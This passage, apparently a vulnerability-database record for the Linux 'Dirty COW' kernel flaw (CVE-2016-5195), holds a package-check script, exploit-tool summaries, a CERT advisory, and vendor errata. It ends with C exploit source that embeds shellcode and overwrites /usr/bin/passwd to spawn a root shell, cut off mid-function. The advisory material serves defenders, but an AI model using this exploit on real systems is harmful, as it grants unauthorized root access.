See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842974\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-05 09:53:02 +0100 (Mon, 05 Dec 2016)\");\n script_cve_id(\"CVE-2016-5195\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-raspi2 USN-3107-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-raspi2'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that a race condition\n existed in the memory manager of the Linux kernel when handling copy-on-write\n breakage of private read-only memory mappings. 
A local attacker could use this\n to gain administrative privileges.\");\n script_tag(name:\"affected\", value:\"linux-raspi2 on Ubuntu 16.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3107-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3107-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.8.0-1017-raspi2\", ver:\"4.8.0-1017.20\", rls:\"UBUNTU16.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-11-15T12:42:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "edition": 3, "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. 
\n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "id": "SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183", "type": "saint", "title": "Linux Dirty COW Local File Overwrite", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "edition": 2, "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. 
\n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "id": "SAINT:1E3BA1480EBC78481EFFC9BD1CFFBBE2", "type": "saint", "title": "Linux Dirty COW Local File Overwrite", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "description": "Added: 10/27/2016 \nCVE: [CVE-2016-5195](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195>) \nBID: [93793](<http://www.securityfocus.com/bid/93793>) \n\n\n### Background\n\nThis tool allows you to overwrite an arbitrary file on Linux systems. \n\n### Problem\n\nA race condition exists in the way the Linux kernel's memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus gain elevated privileges on the system. \n\n### Resolution\n\nUpgrade to a fixed kernel package from your Linux vendor. \n\n### References\n\n<http://dirtycow.ninja/> \n<https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c> \n\n\n### Limitations\n\nExploit requires an existing unprivileged connection to the target. 
\n\n### Platforms\n\nLinux \n \n\n", "edition": 4, "modified": "2016-10-27T00:00:00", "published": "2016-10-27T00:00:00", "id": "SAINT:ACA0D81E9F0D7499A5952D634DA1559F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/linux_dirty_cow_local_file_overwrite", "title": "Linux Dirty COW Local File Overwrite", "type": "saint", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:19", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "### Overview \n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem, which may be leveraged locally to gain root privileges.\n\n### Description \n\n[**CWE-362**](<https://cwe.mitre.org/data/definitions/362.html>)**: Concurrent Execution using Shared Resource with Improper Synchonization ('Race Condition') -** CVE-2016-5195\n\nThe Linux kernel since version 2.6.22 contains a race condition in the way the copy on write mechanism is handled by the memory subsystem. A local attacker may leverage this vulnerability in affected systems to gain root privileges. For more information, including proofs of concept, refer to the [Dirty COW disclosure page](<https://dirtycow.ninja/>). \n \nNote that this vulnerability is reported as being actively exploited in the wild. \n \n--- \n \n### Impact \n\nA local, unprivileged attacker can escalate privileges to root. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nLinux kernel versions [4.8.3](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>), [4.7.9](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>), and [4.4.26](<https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>) address this vulnerability. 
[Red Hat](<https://access.redhat.com/security/cve/cve-2016-5195>), [Debian](<https://security-tracker.debian.org/tracker/CVE-2016-5195>), and [Ubuntu](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>) have released patches. Users should apply patches through their Linux distributions' normal update process. \n \n--- \n \n### Vendor Information\n\n243144\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### CentOS Affected\n\nNotified: October 21, 2016 Updated: October 27, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [https://www.centos.org/forums/viewtopic.php?f=51&t=59782&hilit=CVE%202016%205195&start=10](<https://www.centos.org/forums/viewtopic.php?f=51&t=59782&hilit=CVE%202016%205195&start=10>)\n\n### CoreOS Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://coreos.com/blog/CVE-2016-5195.html>\n\n### Debian GNU/Linux Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.debian.org/security/2016/dsa-3696>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n\n### Red Hat, Inc. 
Affected\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n\n### SUSE Linux __ Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSUSE and the openSUSE project are affected by this issue and we have released updates. \n \n<https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.suse.com/security/cve/CVE-2016-5195.html>\n\n### Ubuntu Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n\n### Arista Networks, Inc. __ Not Affected\n\nNotified: October 21, 2016 Updated: October 24, 2016 \n\n**Statement Date: October 24, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nArista Network's software products EOS and Cloud Vision Portal (CVP) are not exploitable by CVE-2016-5195 (Kernel Local Privilege Escalation). 
\n \nFor further information: \n<https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.arista.com/en/support/advisories-notices/security-advisories/1753-field-notice-0026>\n\n### Peplink __ Not Affected\n\nUpdated: November 17, 2016 \n\n**Statement Date: November 17, 2016**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWanting to state that Peplink Pepwave products are not affected by Dirty COW \n \nOur own announcement: \n<https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://forum.peplink.com/threads/7579-Unaffected-Security-Notice-for-Dirty-COW-CVE-2016-5195>\n\n### Arch Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Fedora Project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Gentoo Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Openwall GNU/*/Linux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Slackware Linux Inc. 
Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Tizen Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Turbolinux Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: October 21, 2016 Updated: October 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\nView all 16 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.8 | AV:L/AC:L/Au:S/C:C/I:C/A:C \nTemporal | 5.6 | E:F/RL:OF/RC:C \nEnvironmental | 5.6 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://dirtycow.ninja/>\n * <https://access.redhat.com/security/cve/cve-2016-5195>\n * <https://security-tracker.debian.org/tracker/CVE-2016-5195>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5195.html>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.8.3>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.7.9>\n * <https://cdn.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.4.26>\n * <https://cwe.mitre.org/data/definitions/362.html>\n\n### Acknowledgements\n\nRed Hat credits Phil Oester with reporting this vulnerability.\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-5195](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-5195>) \n---|--- \n**Date Public:** | 2016-10-20 \n**Date First Published:** | 2016-10-21 \n**Date Last Updated: ** | 2016-11-17 13:17 UTC \n**Document Revision: ** | 15 \n", 
"modified": "2016-11-17T13:17:00", "published": "2016-10-21T00:00:00", "id": "VU:243144", "href": "https://www.kb.cert.org/vuls/id/243144", "type": "cert", "title": "Linux kernel memory subsystem copy on write mechanism contains a race condition vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2018-04-12T03:32:44", "published": "2016-10-24T16:01:05", "id": "RHSA-2016:2098", "href": "https://access.redhat.com/errata/RHSA-2016:2098", "type": "redhat", "title": "(RHSA-2016:2098) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2018-06-06T20:24:30", "published": "2016-10-26T00:57:14", "id": "RHSA-2016:2105", "href": "https://access.redhat.com/errata/RHSA-2016:2105", "type": "redhat", "title": "(RHSA-2016:2105) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:09", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. (CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-26T21:24:34", "published": "2016-10-26T19:24:13", "id": "RHSA-2016:2118", "href": "https://access.redhat.com/errata/RHSA-2016:2118", "type": "redhat", "title": "(RHSA-2016:2118) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:13", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.\n\nBug Fix(es):\n\n* Previously, the BUG_ON() signal appeared in the fs_clear_inode() function where the nfs_have_writebacks() function reported a positive value for nfs_inode->npages. As a consequence, a kernel panic occurred. The provided patch performs a serialization by holding the inode i_lock over the check of PagePrivate and locking the request, which fixes this bug. (BZ#1365157)", "modified": "2016-11-01T17:09:43", "published": "2016-11-01T14:16:02", "id": "RHSA-2016:2132", "href": "https://access.redhat.com/errata/RHSA-2016:2132", "type": "redhat", "title": "(RHSA-2016:2132) Important: kernel security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:58", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged, local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. 
(CVE-2016-5195, Important)\n\nRed Hat would like to thank Phil Oester for reporting this issue.", "modified": "2016-10-27T12:44:17", "published": "2016-10-27T12:41:42", "id": "RHSA-2016:2120", "href": "https://access.redhat.com/errata/RHSA-2016:2120", "type": "redhat", "title": "(RHSA-2016:2120) Important: kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "kernel-uek\n[3.8.13-118.13.3]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: 24928591] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ELSA-2016-3633", "href": "http://linux.oracle.com/errata/ELSA-2016-3633.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "[2.6.39-400.286.3]\n- mm, gup: close FOLL MAP_PRIVATE race (Linus Torvalds) [Orabug: 24928646] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-22T00:00:00", "published": "2016-10-22T00:00:00", "id": "ELSA-2016-3634", "href": "http://linux.oracle.com/errata/ELSA-2016-3634.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "kernel-uek\n[4.1.12-61.1.16]\n- mm: remove gup_flags FOLL_WRITE games from __get_user_pages() (Linus Torvalds) [Orabug: 24927306] {CVE-2016-5195}\n[4.1.12-61.1.15]\n- drivers/nvme: provide a module parameter for setting number of I/O queues (Shan Hai) [Orabug: 24914956] \n- blk-mq: improve warning for running a queue on the wrong CPU (Jens Axboe) [Orabug: 24914956] \n- blk-mq: fix 
freeze queue race (Shan Hai) [Orabug: 24914956]", "edition": 4, "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "id": "ELSA-2016-3632", "href": "http://linux.oracle.com/errata/ELSA-2016-3632.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:12", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "- [3.10.0-327.36.3.OL7]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-327.36.3]\n- [mm] remove gup_flags FOLL_WRITE games from __get_user_pages() (Alexander Gordeev) [1385123 1385124] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-24T00:00:00", "published": "2016-10-24T00:00:00", "id": "ELSA-2016-2098", "href": "http://linux.oracle.com/errata/ELSA-2016-2098.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-5195"], "description": "[2.6.32-642.6.2]\n- [mm] close FOLL MAP_PRIVATE race (Larry Woodman) [1385116 1385117] {CVE-2016-5195}", "edition": 4, "modified": "2016-10-25T00:00:00", "published": "2016-10-25T00:00:00", "id": "ELSA-2016-2105", "href": "http://linux.oracle.com/errata/ELSA-2016-2105.html", "title": "kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-05T07:15:40", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-10-22T00:00:00", "type": "zdt", "title": "DirtyCow Local Root Proof Of Concept Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-22T00:00:00", "href": "https://0day.today/exploit/description/25943", "id": "1337DAY-ID-25943", "sourceData": "/*\r\n* (un)comment correct payload first (x86 or x64)!\r\n* \r\n* $ gcc 
cowroot.c -o cowroot -pthread\r\n* $ ./cowroot\r\n* DirtyCow root privilege escalation\r\n* Backing up /usr/bin/passwd.. to /tmp/bak\r\n* Size of binary: 57048\r\n* Racing, this may take a while..\r\n* /usr/bin/passwd overwritten\r\n* Popping root shell.\r\n* Don't forget to restore /tmp/bak\r\n* thread stopped\r\n* thread stopped\r\n* [email\u00a0protected]:/root/cow# id\r\n* uid=0(root) gid=1000(foo) groups=1000(foo)\r\n*\r\n* @robinverton \r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\nvoid *map;\r\nint f;\r\nint stop = 0;\r\nstruct stat st;\r\nchar *name;\r\npthread_t pth1,pth2,pth3;\r\n\r\n// change if no permissions to read\r\nchar suid_binary[] = \"/usr/bin/passwd\";\r\n\r\n/*\r\n* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\n*/ \r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,\r\n 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,\r\n 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,\r\n 0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 
0x73,\r\n 0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05\r\n};\r\nunsigned int sc_len = 177;\r\n\r\n/*\r\n* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i\r\nunsigned char sc[] = {\r\n 0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,\r\n 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\r\n 0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,\r\n 0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,\r\n 0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,\r\n 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,\r\n 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,\r\n 0x89, 0xe1, 0xcd, 0x80\r\n};\r\nunsigned int sc_len = 136;\r\n*/\r\n\r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<1000000 && !stop;i++) {\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f, str, sc_len);\r\n }\r\n printf(\"thread stopped\\n\");\r\n}\r\n\r\nvoid *waitForWrite(void *arg) {\r\n char buf[sc_len];\r\n\r\n for(;;) {\r\n FILE *fp = fopen(suid_binary, \"rb\");\r\n\r\n fread(buf, sc_len, 1, fp);\r\n\r\n if(memcmp(buf, sc, sc_len) == 0) {\r\n printf(\"%s overwritten\\n\", suid_binary);\r\n break;\r\n }\r\n\r\n fclose(fp);\r\n sleep(1);\r\n }\r\n\r\n stop = 1;\r\n\r\n printf(\"Popping root shell.\\n\");\r\n 
